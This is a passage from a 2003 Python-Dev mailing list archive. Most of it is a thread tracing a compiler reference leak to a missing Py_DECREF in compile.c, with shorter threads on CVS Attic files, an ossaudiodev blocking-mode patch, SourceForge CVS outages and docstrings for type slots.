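alive_after = ref() is not None   # the cycle collector reclaims it
gc.enable()
```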

ciao - chris
-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From neal@metaslash.com  Mon Mar 24 13:43:16 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Mon, 24 Mar 2003 08:43:16 -0500
Subject: [Python-Dev] funny leak
In-Reply-To: <3E7EFCCC.2090202@tismer.com>
References: <3E7EFCCC.2090202@tismer.com>
Message-ID: <20030324134316.GR25722@epoch.metaslash.com>

On Mon, Mar 24, 2003 at 01:40:44PM +0100, Christian Tismer wrote:
> 
> I just tested generators and found a memory leak.
> (Has nothing to do with generators).
> The following code adds one to the overall refcount
> and gc cannot reclaim it.
> 
> def conjoin(gs):
>     def gen():
>         gs      # unbreakable cycle
>         gen     # unless one is commented out

With current CVS:

        >>> gc.collect()
        0
        [23150 refs]
        >>> conjoin(1)
        [23160 refs]
        >>> conjoin(1)
        [23170 refs]
        >>> gc.collect()
        8
        [23151 refs]
        >>> conjoin(1)
        [23161 refs]
        >>> conjoin(1)
        [23171 refs]
        >>> gc.collect()
        8
        [23151 refs]
        >>> conjoin(1)
        [23161 refs]
        >>> conjoin(1)
        [23171 refs]
        >>> gc.collect()
        8
        [23151 refs]

One ref may be leaked the first time gc.collect() is called with
garbage (23150 -> 23151).  But after that, no more refs are leaked
(ref count stays at 23151).

Neal


From jepler@unpythonic.net  Mon Mar 24 13:51:00 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Mon, 24 Mar 2003 07:51:00 -0600
Subject: [Python-Dev] funny leak
In-Reply-To: <20030324134316.GR25722@epoch.metaslash.com>
References: <3E7EFCCC.2090202@tismer.com> <20030324134316.GR25722@epoch.metaslash.com>
Message-ID: <20030324135059.GB28860@unpythonic.net>

On Mon, Mar 24, 2003 at 08:43:16AM -0500, Neal Norwitz wrote:
> One ref may be leaked the first time gc.collect() is called with
> garbage (23150 -> 23151).  But after that, no more refs are leaked
> (ref count stays at 23151).

If that's true, then running the 'def' block repeatedly will leak
references, right?  I think from Christian's original message this is
what he meant, but I'm not sure.

Jeff


From neal@metaslash.com  Mon Mar 24 14:00:23 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Mon, 24 Mar 2003 09:00:23 -0500
Subject: [Python-Dev] funny leak
In-Reply-To: <20030324135059.GB28860@unpythonic.net>
References: <3E7EFCCC.2090202@tismer.com>
 <20030324134316.GR25722@epoch.metaslash.com>
 <20030324135059.GB28860@unpythonic.net>
Message-ID: <20030324140023.GT25722@epoch.metaslash.com>

On Mon, Mar 24, 2003 at 07:51:00AM -0600, Jeff Epler wrote:
> On Mon, Mar 24, 2003 at 08:43:16AM -0500, Neal Norwitz wrote:
> > One ref may be leaked the first time gc.collect() is called with
> > garbage (23150 -> 23151).  But after that, no more refs are leaked
> > (ref count stays at 23151).
> 
> If that's true, then running the 'def' block repeatedly will leak
> references, right?  I think from Christian's original message this is
> what he meant, but I'm not sure.

I misread the original message.  Running the 'def' block does indeed
leak a reference and collect() has no effect.  Similarly:

        [23154 refs]
        >>> def conjoin(gs):
        ...     def gen():
        ...         gs      # unbreakable cycle
        ...         gen     # unless one is commented out
        ... 
        [23194 refs]
        >>> del conjoin
        [23155 refs]

Neal


From tismer@tismer.com  Mon Mar 24 14:04:46 2003
From: tismer@tismer.com (Christian Tismer)
Date: Mon, 24 Mar 2003 15:04:46 +0100
Subject: [Python-Dev] funny leak
In-Reply-To: <20030324134316.GR25722@epoch.metaslash.com>
References: <3E7EFCCC.2090202@tismer.com> <20030324134316.GR25722@epoch.metaslash.com>
Message-ID: <3E7F107E.4020403@tismer.com>

Neal Norwitz wrote:
> On Mon, Mar 24, 2003 at 01:40:44PM +0100, Christian Tismer wrote:
> 
>>I just tested generators and found a memory leak.
>>(Has nothing to do with generators).
>>The following code adds one to the overall refcount
>>and gc cannot reclaim it.
>>
>>def conjoin(gs):
>>    def gen():
>>        gs      # unbreakable cycle
>>        gen     # unless one is commented out
> 
> 
> With current CVS:
...

> One ref may be leaked the first time gc.collect() is called with
> garbage (23150 -> 23151).  But after that, no more refs are leaked
> (ref count stays at 23151).

No, this is not the point. Don't call the function
at all, just execute the above code and call
gc.collect(). You will see one reference eaten
every time you repeat this.

ciao - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From tismer@tismer.com  Mon Mar 24 14:05:18 2003
From: tismer@tismer.com (Christian Tismer)
Date: Mon, 24 Mar 2003 15:05:18 +0100
Subject: [Python-Dev] funny leak
In-Reply-To: <20030324135059.GB28860@unpythonic.net>
References: <3E7EFCCC.2090202@tismer.com> <20030324134316.GR25722@epoch.metaslash.com> <20030324135059.GB28860@unpythonic.net>
Message-ID: <3E7F109E.2060401@tismer.com>

Jeff Epler wrote:
> On Mon, Mar 24, 2003 at 08:43:16AM -0500, Neal Norwitz wrote:
> 
>>One ref may be leaked the first time gc.collect() is called with
>>garbage (23150 -> 23151).  But after that, no more refs are leaked
>>(ref count stays at 23151).
> 
> 
> If that's true, then running the 'def' block repeatedly will leak
> references, right?  I think from Christian's original message this is
> what he meant, but I'm not sure.

Exactly.
-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From oren-py-d@hishome.net  Mon Mar 24 14:06:38 2003
From: oren-py-d@hishome.net (Oren Tirosh)
Date: Mon, 24 Mar 2003 09:06:38 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <uhe9toenx.fsf@boost-consulting.com>
References: <ur88zougj.fsf@boost-consulting.com> <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net> <uof42i1ey.fsf@boost-consulting.com> <200303232115.h2NLFFA04846@pcp02138704pcs.reston01.va.comcast.net> <uof41oim2.fsf@boost-consulting.com> <200303232233.h2NMXx905265@pcp02138704pcs.reston01.va.comcast.net> <uhe9toenx.fsf@boost-consulting.com>
Message-ID: <20030324140638.GA41602@hishome.net>

On Sun, Mar 23, 2003 at 06:18:26PM -0500, David Abrahams wrote:
> Guido van Rossum <guido@python.org> writes:
...
> > [Guido]
...>
> > [David again]
...
> > > [Guido]
..

Ummm... I'm confused. So what is the recommended way to do it? 

   Oren


From tim.one@comcast.net  Mon Mar 24 15:57:04 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 24 Mar 2003 10:57:04 -0500
Subject: [Python-Dev] funny leak
In-Reply-To: <3E7F107E.4020403@tismer.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHIECAB.tim.one@comcast.net>

[Christian Tismer]
> No, this is not the point. Don't call the function
> at all, just execute the above code and call
> gc.collect(). You will see one reference eaten
> every time you repeat this.

Can you show explicit evidence instead of trying to describe it?  Here's
what I tried:

def one():
    def conjoin(gs):
        def gen():
            gs      # unbreakable cycle
            gen     # unless one is commented out

import sys, gc
lastrc = 0
while 1:
    one()
    gc.collect()
    thisrc = sys.gettotalrefcount()
    print thisrc - lastrc,
    lastrc = thisrc

Running that program under a debug-build CVS Python shows no growth in
sys.gettotalrefcount() after the first two iterations.  It also displays no
process-size growth.  IOW, I see no evidence of any flavor of leak.

I don't claim that you don't, but I don't know what "just execute the above
code ... one reference eaten every time" *means*.  It can't mean executing
the specific program I pasted in above, because that simply doesn't eat a
reference each time.


From tim.one@comcast.net  Mon Mar 24 16:02:14 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 24 Mar 2003 11:02:14 -0500
Subject: [Python-Dev] funny leak
In-Reply-To: <3E7F107E.4020403@tismer.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHJECAB.tim.one@comcast.net>

OK, *this* program leaks a reference each time around; probably a missing
decref in the compiler:

source = """\
def conjoin(gs):
    def gen():
        gs      # unbreakable cycle
        gen     # unless one is commented out
"""

def one():
    exec source in {}

import sys, gc
lastrc = 0
while 1:
    one()
    gc.collect()
    thisrc = sys.gettotalrefcount()
    print thisrc - lastrc,
    lastrc = thisrc


From tim.one@comcast.net  Mon Mar 24 16:10:46 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 24 Mar 2003 11:10:46 -0500
Subject: [Python-Dev] funny leak
In-Reply-To: <3E7F107E.4020403@tismer.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEHJECAB.tim.one@comcast.net>

OK, there's no leaking memory here, but there is a leaking refcount:  the
refcount on the int 0 keeps going up.  The compiler has leaked references to
little integers before, but offhand I don't recall the details.



From mwh@python.net  Mon Mar 24 16:47:34 2003
From: mwh@python.net (Michael Hudson)
Date: Mon, 24 Mar 2003 16:47:34 +0000
Subject: [Python-Dev] funny leak
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEHJECAB.tim.one@comcast.net> (Tim
 Peters's message of "Mon, 24 Mar 2003 11:10:46 -0500")
References: <LNBBLJKPBEHFEDALKOLCOEHJECAB.tim.one@comcast.net>
Message-ID: <2m7kaoaezd.fsf@starship.python.net>

Tim Peters <tim.one@comcast.net> writes:

> OK, there's no leaking memory here, but there is a leaking refcount:  the
> refcount on the int 0 keeps going up.  The compiler has leaked references to
> little integers before, but offhand I don't recall the details.

This seems to be all it takes:

Index: compile.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Python/compile.c,v
retrieving revision 2.275
diff -c -C7 -r2.275 compile.c
*** compile.c	12 Feb 2003 16:56:51 -0000	2.275
--- compile.c	24 Mar 2003 16:43:28 -0000
***************
*** 4524,4537 ****
--- 4564,4578 ----
  	d = PyDict_New();
  	for (i = PyList_GET_SIZE(list); --i >= 0; ) {
  		v = PyInt_FromLong(i);
  		if (v == NULL) 
  			goto fail;
  		if (PyDict_SetItem(d, PyList_GET_ITEM(list, i), v) < 0)
  			goto fail;
+ 		Py_DECREF(v);
  		if (PyDict_DelItem(*cellvars, PyList_GET_ITEM(list, i)) < 0)
  			goto fail;
  	}
  	pos = 0;
  	i = PyList_GET_SIZE(list);
  	Py_DECREF(list);
  	while (PyDict_Next(*cellvars, &pos, &v, &w)) {

... found by the obscure strategy of searching for "PyInt_FromLong" in
Python/compile.c ...

A quick eyeballing suggests there are a bunch more of these, but only
on error returns.
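
The added Py_DECREF is needed because PyDict_SetItem() does not take over
the caller's reference: the dict acquires one of its own, so the caller
still has to release the one returned by PyInt_FromLong().  The same
ownership rule can be observed from Python.  This is only an illustration in
present-day Python 3, not part of the patch, and the variable names are
arbitrary:

```python
import sys

value = object()
table = {}

before = sys.getrefcount(value)
table["slot"] = value            # the dict takes its own reference
after_store = sys.getrefcount(value)

del table["slot"]                # the dict gives that reference back
after_delete = sys.getrefcount(value)

print(after_store - before, after_delete - before)
```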

Cheers,
M.

-- 
  ... when all the programmes on all the channels actually were made
  by actors with cleft pallettes speaking lines by dyslexic writers
  filmed by blind cameramen instead of merely seeming like that, it
  somehow made the whole thing more worthwhile.   -- HHGTG, Episode 11


From jacobs@penguin.theopalgroup.com  Mon Mar 24 17:37:18 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Mon, 24 Mar 2003 12:37:18 -0500 (EST)
Subject: [Python-Dev] funny leak
In-Reply-To: <2m7kaoaezd.fsf@starship.python.net>
Message-ID: <Pine.LNX.4.44.0303241234530.16478-100000@penguin.theopalgroup.com>

On Mon, 24 Mar 2003, Michael Hudson wrote:

> Tim Peters <tim.one@comcast.net> writes:
> 
> > OK, there's no leaking memory here, but there is a leaking refcount:  the
> > refcount on the int 0 keeps going up.  The compiler has leaked references to
> > little integers before, but offhand I don't recall the details.
> 
> This seems to be all it takes:

Your patch isn't a 100% fix, since a reference can still be leaked if the
PyDict_SetItem fails.  If nobody beats me to it, I can do a validation pass
through compile.c and see how many I can squash.

-Kevin



-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com


From tim.one@comcast.net  Mon Mar 24 17:51:40 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 24 Mar 2003 12:51:40 -0500
Subject: [Python-Dev] funny leak
In-Reply-To: <Pine.LNX.4.44.0303241234530.16478-100000@penguin.theopalgroup.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEIBECAB.tim.one@comcast.net>

[Michael Hudson]
>> This seems to be all it takes:

[Kevin Jacobs]
> Your patch isn't a 100% fix, since a reference can still be leaked if
> the PyDict_SetItem fails.

The patch I checked in paid attention to that.

> If nobody beats me to it, I can do a validation pass
> through compile.c and see how many I can squash.
> ...
> A quick eyeballing suggests there are a bunch more of these, but only
> on error returns.

Possibly.  If a dict setitem call fails, it's almost certainly because we're
out of memory, and the program is going to die soon regardless.  How much
pain it's worth to die with a refcount that's not one too large is open to
debate <wink>.


From mwh@python.net  Mon Mar 24 17:55:40 2003
From: mwh@python.net (Michael Hudson)
Date: Mon, 24 Mar 2003 17:55:40 +0000
Subject: [Python-Dev] funny leak
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEIBECAB.tim.one@comcast.net> (Tim
 Peters's message of "Mon, 24 Mar 2003 12:51:40 -0500")
References: <LNBBLJKPBEHFEDALKOLCCEIBECAB.tim.one@comcast.net>
Message-ID: <2my9348x9f.fsf@starship.python.net>

Tim Peters <tim.one@comcast.net> writes:

[me]
>> A quick eyeballing suggests there are a bunch more of these, but only
>> on error returns.
>
> Possibly.  If a dict setitem call fails, it's almost certainly because we're
> out of memory, and the program is going to die soon regardless.  How much
> pain it's worth to die with a refcount that's not one too large is open to
> debate <wink>.

This occurred to me too.  I don't think I care enough to do anything
about it today.

Cheers,
M.

-- 
  In case you're not a computer person, I should probably point out
  that "Real Soon Now" is a technical term meaning "sometime before
  the heat-death of the universe, maybe".
                                     -- Scott Fahlman <sef@cs.cmu.edu>


From tim.one@comcast.net  Mon Mar 24 17:59:54 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 24 Mar 2003 12:59:54 -0500
Subject: [Python-Dev] funny leak
In-Reply-To: <2m7kaoaezd.fsf@starship.python.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEIDECAB.tim.one@comcast.net>

[Michael Hudson]
> ... found by the obscure strategy of searching for "PyInt_FromLong" in
> Python/compile.c ...

Heh.  Here at the PyCon sprint, Jeremy & I did the same thing.  The mystery
for you is how I figured out 0 was leaking to begin with -- but my lips are
sealed.


From skip@pobox.com  Mon Mar 24 18:16:27 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 24 Mar 2003 12:16:27 -0600
Subject: [Python-Dev] funny leak
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEIDECAB.tim.one@comcast.net>
References: <2m7kaoaezd.fsf@starship.python.net>
 <LNBBLJKPBEHFEDALKOLCAEIDECAB.tim.one@comcast.net>
Message-ID: <15999.19323.486024.376000@montanaro.dyndns.org>

    Tim> Heh.  Here at the PyCon sprint ...

So how's it going?

S


From tim.one@comcast.net  Mon Mar 24 20:19:55 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 24 Mar 2003 15:19:55 -0500
Subject: [Python-Dev] funny leak
In-Reply-To: <15999.19323.486024.376000@montanaro.dyndns.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEILECAB.tim.one@comcast.net>

[Tim]
> Heh.  Here at the PyCon sprint ...

[Skip Montanaro]
> So how's it going?

I wouldn't have guessed it, but legions of Indonesian houseboys giving
sprinters foot massages really does increase productivity!  I'm not so sure
about the ubiquitous champagne fountains, though.

roughing-it-ly y'rs  - tim


From tismer@tismer.com  Mon Mar 24 22:48:43 2003
From: tismer@tismer.com (Christian Tismer)
Date: Mon, 24 Mar 2003 23:48:43 +0100
Subject: [Python-Dev] funny leak
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEHIECAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCGEHIECAB.tim.one@comcast.net>
Message-ID: <3E7F8B4B.1040006@tismer.com>

Tim Peters wrote:
> [Christian Tismer]
> 
>>No, this is not the point. Don't call the function
>>at all, just execute the above code and call
>>gc.collect(). You will see one reference eaten
>>every time you repeat this.
> 
> 
> Can you show explicit evidence instead of trying to describe it?  Here's
> what I tried:

Sorry, I had to re-read your message several times
until I understood where I wasn't clear:

By "execute" I meant exec() this piece of Python code.
I actually pasted it in, watching the refcount grow.

cheers - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From skip@pobox.com  Tue Mar 25 00:06:22 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 24 Mar 2003 18:06:22 -0600
Subject: [Python-Dev] Checkins to Attic?
Message-ID: <15999.40318.473557.200043@montanaro.dyndns.org>

I noticed on the python-checkins list that several changes (newcompile.c and
friends) were checked into what appears to be the Attic, e.g.:

    Update of /cvsroot/python/python/dist/src/Python
    In directory sc8-pr-cvs1:/tmp/cvs-serv2961/Python

    Modified Files:
          Tag: ast-branch
            newcompile.c 
    Log Message:
    Redeclared stuff to stop wngs about signed-vs-unsigned mismatches.


    Index: newcompile.c
    ===================================================================
    RCS file: /cvsroot/python/python/dist/src/Python/Attic/newcompile.c,v
    retrieving revision 1.1.2.23
    retrieving revision 1.1.2.24

Note the RCS file above.  Not all files were in the Attic though:

    Update of /cvsroot/python/python/dist/src/Include
    In directory sc8-pr-cvs1:/tmp/cvs-serv2961/Include

    Modified Files:
          Tag: ast-branch
            compile.h 
    Log Message:
    Redeclared stuff to stop wngs about signed-vs-unsigned mismatches.


    Index: compile.h
    ===================================================================
    RCS file: /cvsroot/python/python/dist/src/Include/compile.h,v

I'm probably just missing something obvious, but I thought I'd ask.

Skip


From tim.one@comcast.net  Tue Mar 25 00:10:56 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 24 Mar 2003 19:10:56 -0500
Subject: [Python-Dev] Checkins to Attic?
In-Reply-To: <15999.40318.473557.200043@montanaro.dyndns.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEKAECAB.tim.one@comcast.net>

As explained on the checkins list, files that are brand new on a branch live
in the Attic.  CVS uses the Attic for several things, and there's no problem
here.


From neal@metaslash.com  Tue Mar 25 00:11:31 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Mon, 24 Mar 2003 19:11:31 -0500
Subject: [Python-Dev] Checkins to Attic?
In-Reply-To: <15999.40318.473557.200043@montanaro.dyndns.org>
References: <15999.40318.473557.200043@montanaro.dyndns.org>
Message-ID: <20030325001130.GD12443@epoch.metaslash.com>

On Mon, Mar 24, 2003 at 06:06:22PM -0600, Skip Montanaro wrote:
> I noticed on the python-checkins list that several changes (newcompile.c and
> friends) were checked into what appears to be the Attic, e.g.:
> 
        [snip Attic/newcompile.c]
> 
> Note the RCS file above.  Not all files were in the Attic though:
> 
        [snip Include/compile.h]
> 
> I'm probably just missing something obvious, but I thought I'd ask.

newcompile.c only exists on the branch, not on the head, but
compile.h exists in the head.

I believe files that are only on the branch reside in the Attic.
But shhhh, don't tell the neighbors. :-)

Neal


From gward@python.net  Tue Mar 25 02:04:20 2003
From: gward@python.net (Greg Ward)
Date: Mon, 24 Mar 2003 21:04:20 -0500
Subject: [Python-Dev] ossaudiodev tweak needs testing
Message-ID: <20030325020420.GA1406@cthulhu.gerg.ca>

Hi all -- I have another tweak to the ossaudiodev module that might make
it work a little better.  Background: some time ago, Jeremy and Guido
had problems with test_ossaudiodev hanging due to a blocking open()
call.  So I made the open() non-blocking in rev 1.25 on 2003/03/11.  But
that screwed things up for David Hammerton, who emailed me privately the
other day that a write() call later on was dying with EAGAIN -- not
entirely surprising, since that's how write() is supposed to behave on a
file descriptor opened with O_NONBLOCK if it would have blocked.  Most
OSS device drivers don't actually act that way (sigh), but apparently
David's does.

So this patch reverses the effect of open() with O_NONBLOCK, meaning the
file is back in blocking mode in the conventional Unix sense.  (It's in
blocking mode in the OSS sense the whole time, or at least until Python
code calls the nonblock() method on it.)  If you have a Linux or FreeBSD
machine with sound hardware that works, can you please run

  ./python Lib/test/regrtest.py -uaudio test_ossaudiodev

with the current CVS head (ie. rev 1.25 of ossaudiodev.c and rev 1.4 of
test_ossaudiodev.py), then apply this patch:

--- Modules/ossaudiodev.c       11 Mar 2003 16:53:13 -0000      1.25
+++ Modules/ossaudiodev.c       25 Mar 2003 01:54:46 -0000
@@ -139,6 +139,15 @@
         PyErr_SetFromErrnoWithFilename(PyExc_IOError, basedev);
         return NULL;
     }
+
+    /* And (try to) put it back in blocking mode so we get the
+       expected write() semantics. */
+    if (fcntl(fd, F_SETFL, 0) == -1) {
+        close(fd);
+        PyErr_SetFromErrnoWithFilename(PyExc_IOError, basedev);
+        return NULL;
+    }
+
     if (ioctl(fd, SNDCTL_DSP_GETFMTS, &afmts) == -1) {
         PyErr_SetFromErrnoWithFilename(PyExc_IOError, basedev);
         return NULL;

and try it again?  If it works in both cases, great.  If it crashed with
CVS head (EAGAIN from write()?), and now works, wonderful!  (Please let
me know.)  If it works before this patch but not with it, then PLEASE
let me know!  Otherwise I'll check this in.
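
For readers who want to see the flag change in isolation, here is a rough
Python 3 sketch of the same idea using the fcntl module.  It is an
illustration only: a pipe stands in for the audio device, make_blocking and
is_nonblocking are made-up helper names, and unlike the C patch (which
passes 0 to F_SETFL) it clears only O_NONBLOCK and leaves the other status
flags alone:

```python
import fcntl
import os


def make_blocking(fd):
    """Clear O_NONBLOCK on fd, leaving the other status flags alone."""
    flags = fcntl.fcntl(fd, fcntl.F_GETFL)
    fcntl.fcntl(fd, fcntl.F_SETFL, flags & ~os.O_NONBLOCK)


def is_nonblocking(fd):
    """Report whether O_NONBLOCK is currently set on fd."""
    return bool(fcntl.fcntl(fd, fcntl.F_GETFL) & os.O_NONBLOCK)


read_end, write_end = os.pipe()
try:
    # Put the descriptor into the state a non-blocking open() leaves it in.
    flags = fcntl.fcntl(write_end, fcntl.F_GETFL)
    fcntl.fcntl(write_end, fcntl.F_SETFL, flags | os.O_NONBLOCK)
    was_nonblocking = is_nonblocking(write_end)

    # Then reverse it, as the patch does right after open().
    make_blocking(write_end)
    now_nonblocking = is_nonblocking(write_end)
finally:
    os.close(read_end)
    os.close(write_end)

print(was_nonblocking, now_nonblocking)
```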

Thanks --

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/


From graham_guttocks@yahoo.co.nz  Tue Mar 25 19:42:00 2003
From: graham_guttocks@yahoo.co.nz (=?iso-8859-1?q?Graham=20Guttocks?=)
Date: Wed, 26 Mar 2003 07:42:00 +1200 (NZST)
Subject: [Python-Dev] cvs.python.sourceforge.net fouled up
Message-ID: <20030325194200.52171.qmail@web10305.mail.yahoo.com>

$ cvs update
cvs [update aborted]: recv() from server cvs.python.sourceforge.net: EOF

I've been having this problem on and off for weeks now with
anonymous Python cvs.

=====
Regards,
Graham

http://mobile.yahoo.com.au - Yahoo! Mobile
- Check & compose your email via SMS on your Telstra or Vodafone mobile.


From skip@pobox.com  Tue Mar 25 19:58:50 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 25 Mar 2003 13:58:50 -0600
Subject: [Python-Dev] cvs.python.sourceforge.net fouled up
In-Reply-To: <20030325194200.52171.qmail@web10305.mail.yahoo.com>
References: <20030325194200.52171.qmail@web10305.mail.yahoo.com>
Message-ID: <16000.46330.437431.388294@montanaro.dyndns.org>

    Graham> $ cvs update
    Graham> cvs [update aborted]: recv() from server cvs.python.sourceforge.net: EOF

    Graham> I've been having this problem on and off for weeks now with
    Graham> anonymous Python cvs.

I've noticed various problems as well, from extraordinarily slow response
times to failures such as the above.  At the moment it seems to be working
reasonably well.  I'm using authenticated access, not anonymous, though I
don't think that should make a difference.

Skip


From graham_guttocks@yahoo.co.nz  Tue Mar 25 20:22:38 2003
From: graham_guttocks@yahoo.co.nz (=?iso-8859-1?q?Graham=20Guttocks?=)
Date: Wed, 26 Mar 2003 08:22:38 +1200 (NZST)
Subject: [Python-Dev] cvs.python.sourceforge.net fouled up
In-Reply-To: <16000.46330.437431.388294@montanaro.dyndns.org>
Message-ID: <20030325202238.72747.qmail@web10304.mail.yahoo.com>

Skip Montanaro <skip@pobox.com> wrote: 
>
> I'm using authenticate access, not anonymous, though I
> don't think that should make a difference.

Actually, it does make a difference.  I've only had the
problem I posted when using anonymous pserver cvs.  When
using authenticated (ssh) cvs access to sourceforge, my
results are MUCH better.

=====
Regards,
Graham



From martin@v.loewis.de  Tue Mar 25 20:29:04 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 25 Mar 2003 21:29:04 +0100
Subject: [Python-Dev] cvs.python.sourceforge.net fouled up
In-Reply-To: <20030325202238.72747.qmail@web10304.mail.yahoo.com>
References: <20030325202238.72747.qmail@web10304.mail.yahoo.com>
Message-ID: <m31y0vchrj.fsf@mira.informatik.hu-berlin.de>

Graham Guttocks <graham_guttocks@yahoo.co.nz> writes:

> Actually, it does make a difference.  I've only had the
> problem I posted when using anonymous pserver cvs.  When
> using authenticated (ssh) cvs access to sourceforge, my
> results are MUCH better.

This is documented (see site status): in overload situations,
anonymous access is disabled in favour of authenticated access
(to let people who actually work on all this continue to work).

Regards,
Martin


From graham_guttocks@yahoo.co.nz  Tue Mar 25 21:23:17 2003
From: graham_guttocks@yahoo.co.nz (=?iso-8859-1?q?Graham=20Guttocks?=)
Date: Wed, 26 Mar 2003 09:23:17 +1200 (NZST)
Subject: [Python-Dev] cvs.python.sourceforge.net fouled up
In-Reply-To: <m31y0vchrj.fsf@mira.informatik.hu-berlin.de>
Message-ID: <20030325212317.10077.qmail@web10308.mail.yahoo.com>

"Martin v. Löwis" <martin@v.loewis.de> wrote: 
>
> This is documented (see site status): in overload situations,
> anonymous access is disabled in favour of authenticated access

Unfortunately, it seems the "overload" situation is now 
becoming the standard.  I can't remember the last time I
was able to anonymous cvs update on the first try.

=====
Regards,
Graham



From greg@cosc.canterbury.ac.nz  Tue Mar 25 22:49:27 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 26 Mar 2003 10:49:27 +1200 (NZST)
Subject: [Python-Dev] Doc strings for typeslots?
In-Reply-To: <m31y0vchrj.fsf@mira.informatik.hu-berlin.de>
Message-ID: <200303252249.h2PMnR310503@oma.cosc.canterbury.ac.nz>

A Pyrex user recently pointed out to me that trying
to give a docstring to an __xxx__ method of an
extension type doesn't work.

The reason for this is that the C functions implementing
these methods live in slots of the typeobject, and there's
apparently nowhere to put docstrings for them.

I'm speculating that this could be worked around by
getting the slot's wrapper object out of the type
dict after the type is initialised, and stuffing a
docstring into it.

This would only work if a new set of wrappers is created
for each type, rather than re-using generic ones. An
experiment suggests that this is what happens -- can
anyone confirm this?

Or, is there a better way of giving these things
docstrings that I've missed?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From guido@python.org  Tue Mar 25 23:02:14 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 25 Mar 2003 18:02:14 -0500
Subject: [Python-Dev] Doc strings for typeslots?
In-Reply-To: "Your message of Wed, 26 Mar 2003 10:49:27 +1200."
 <200303252249.h2PMnR310503@oma.cosc.canterbury.ac.nz>
References: <200303252249.h2PMnR310503@oma.cosc.canterbury.ac.nz>
Message-ID: <200303252302.h2PN2ER11372@pcp02138704pcs.reston01.va.comcast.net>

> A Pyrex user recently pointed out to me that trying
> to give a docstring to an __xxx__ method of an
> extension type doesn't work.
> 
> The reason for this is that the C functions implementing
> these methods live in slots of the typeobject, and there's
> apparently nowhere to put docstrings for them.
> 
> I'm speculating that this could be worked around by
> getting the slot's wrapper object out of the type
> dict after the type is initialised, and stuffing a
> docstring into it.
> 
> This would only work if a new set of wrappers is created
> for each type, rather than re-using generic ones. An
> experiment suggests that this is what happens -- can
> anyone confirm this?
> 
> Or, is there a better way of giving these things
> docstrings that I've missed?

Um, I'm afraid this is how it is.  __xxx__ methods have generic
docstrings. :-(

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg@cosc.canterbury.ac.nz  Wed Mar 26 00:01:00 2003
